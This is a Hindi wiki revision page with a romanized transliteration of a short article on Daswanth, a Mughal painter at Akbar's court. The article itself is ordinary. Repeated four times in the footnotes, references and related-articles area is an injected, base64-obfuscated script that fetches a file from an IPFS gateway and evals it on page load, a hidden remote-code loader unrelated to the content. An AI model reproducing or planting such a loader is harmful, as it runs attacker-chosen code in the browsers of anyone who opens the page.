Difference between revisions of "दसवंत"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
Line 1: Line 1:
'''दसवंत''' [[मध्यकालीन भारत]] में 16वीं [[शताब्दी]] का एक प्रख्यात भारतीय [[मुग़ल]] चित्रकार था, जिसका उल्लेख [[अकबर]] के दरबार के प्रसिद्ध इतिहासकार [[अबुल फ़ज़ल|अबुल फ़ज़ल अल्लामी]] ने 'अपने समय का पहला अग्रणी कलाकार' के रूप में किया हैं। दसवंत ने अपने समकालीन चित्रकारों को काफ़ी पीछे छोड़ दिया था।  
+
'''दसवंत''' [[मध्यकालीन भारत]] में 16वीं [[शताब्दी]] का एक प्रख्यात भारतीय [[मुग़ल]] चित्रकार था, जिसका उल्लेख [[अकबर]] के दरबार के प्रसिद्ध इतिहासकार [[अबुल फ़ज़ल|अबुल फ़ज़ल अल्लामी]] ने 'अपने समय का पहला अग्रणी कलाकार' के रूप में किया है। दसवंत ने अपने समकालीन चित्रकारों को काफ़ी पीछे छोड़ दिया था।  
  
*दसवंत के जीवन के बारे में बहुत कम जानकारी उपलब्ध हैं। अनुमान है कि वह [[हिन्दू]] था और संभवत: किसी साधारण परिवार से था।
+
*दसवंत के जीवन के बारे में बहुत कम जानकारी उपलब्ध है। अनुमान है कि वह [[हिन्दू]] था और संभवत: किसी साधारण परिवार से था।
 
*[[अकबर]] के संपर्क में आने के बाद अकबर ने दसवंत को [[फ़ारसी भाषा|फ़ारसी]] चित्रकार [[अब्दुस्समद]] के पास प्रशिक्षण के लिए भेजा।
 
*[[अकबर]] के संपर्क में आने के बाद अकबर ने दसवंत को [[फ़ारसी भाषा|फ़ारसी]] चित्रकार [[अब्दुस्समद]] के पास प्रशिक्षण के लिए भेजा।
*आज ऐसे बहुत कम पुस्तक चित्रांकन उपलब्ध हैं, जिन पर दसवंत का नाम है और इनमें से अधिकांश [[जयपुर]] के 'रज़्मनामा' ([[महाभारत]] का फ़ारसी नाम) के चित्रात्मक संस्करणों में हैं। ये वे कृतियाँ हैं, जिनकी रूपरेखा दसवंत ने बनाई थी और चित्र उसके सहयोगियों ने बनाए थे।
+
*आज ऐसे बहुत कम पुस्तक चित्रांकन उपलब्ध हैं, जिन पर दसवंत का नाम है और इनमें से अधिकांश [[जयपुर]] के 'रज़्मनामा'<ref>[[महाभारत]] का फ़ारसी नाम </ref>के चित्रात्मक संस्करणों में हैं। ये वे कृतियाँ हैं, जिनकी रूपरेखा दसवंत ने बनाई थी और चित्र उसके सहयोगियों ने बनाए थे।
*'क्लीवलैंड म्यूज़ियम ऑफ़ आर्ट्स' में रखे 'तूतीनामा' ([[तोता|तोते]] की कहानिया) की पांडुलिपि ही एकमात्र चित्रांकन है, जिस पर दसवंत ने अकेले काम किया था।
+
*'क्लीवलैंड म्यूज़ियम ऑफ़ आर्ट्स' में रखे 'तूतीनामा'<ref>[[तोता|तोते]] की कहानियाँ</ref> की पांडुलिपि ही एकमात्र चित्रांकन है, जिस पर दसवंत ने अकेले काम किया था।
 
*दसवंत की जो भी कृतियाँ बची हैं, वह उसकी प्रतिष्ठा को सिद्ध करने के लिए पर्याप्त हैं।
 
*दसवंत की जो भी कृतियाँ बची हैं, वह उसकी प्रतिष्ठा को सिद्ध करने के लिए पर्याप्त हैं।
 
*अस्थिर मानसिक स्थिति में विक्षिप्तता का दौरा पड़ने पर दसवंत ने 1584 ई. में आत्महत्या कर ली थी।<ref>{{पुस्तक संदर्भ |पुस्तक का नाम=भारत ज्ञानकोश, खण्ड-3|लेखक=इंदु जैन|अनुवादक= |आलोचक= |प्रकाशक=पापुलर प्रकाशन, मुम्बई|संकलन=भारत डिस्कवरी पुस्तकालय|संपादन= |पृष्ठ संख्या=15|url=}}</ref>
 
*अस्थिर मानसिक स्थिति में विक्षिप्तता का दौरा पड़ने पर दसवंत ने 1584 ई. में आत्महत्या कर ली थी।<ref>{{पुस्तक संदर्भ |पुस्तक का नाम=भारत ज्ञानकोश, खण्ड-3|लेखक=इंदु जैन|अनुवादक= |आलोचक= |प्रकाशक=पापुलर प्रकाशन, मुम्बई|संकलन=भारत डिस्कवरी पुस्तकालय|संपादन= |पृष्ठ संख्या=15|url=}}</ref>

Latest revision as of 08:01, 25 June 2016

dasavant madhyakalin bharat mean 16vian shatabdi ka ek prakhyat bharatiy mugal chitrakar tha, jisaka ullekh akabar ke darabar ke prasiddh itihasakar abul fazal allami ne 'apane samay ka pahala agrani kalakar' ke roop mean kiya hai. dasavant ne apane samakalin chitrakaroan ko kafi pichhe chho d diya tha.

  • dasavant ke jivan ke bare mean bahut kam janakari upalabdh hai. anuman hai ki vah hindoo tha aur sanbhavat: kisi sadharan parivar se tha.
  • akabar ke sanpark mean ane ke bad akabar ne dasavant ko farasi chitrakar abdussamad ke pas prashikshan ke lie bheja.
  • aj aise bahut kam pustak chitraankan upalabdh haian, jin par dasavant ka nam hai aur inamean se adhikaansh jayapur ke 'razmanama'[1]ke chitratmak sanskaranoan mean haian. ye ve kritiyaan haian, jinaki rooparekha dasavant ne banaee thi aur chitr usake sahayogiyoan ne banae the.
  • 'klivalaiand myooziyam aauf arts' mean rakhe 'tootinama'[2] ki paandulipi hi ekamatr chitraankan hai, jis par dasavant ne akele kam kiya tha.
  • dasavant ki jo bhi kritiyaan bachi haian, vah usaki pratishtha ko siddh karane ke lie paryapt haian.
  • asthir manasik sthiti mean vikshiptata ka daura p dane par dasavant ne 1584 ee. mean atmahatya kar li thi.[3]


  1. REDIRECTsaancha:inhean bhi dekhean<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. mahabharat ka farasi nam
  2. tote ki kahaniyaan
  3. bharat jnanakosh, khand-3 |lekhak: iandu jain |prakashak: papular prakashan, mumbee |sankalan: bharat diskavari pustakalay |prishth sankhya: 15 | <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>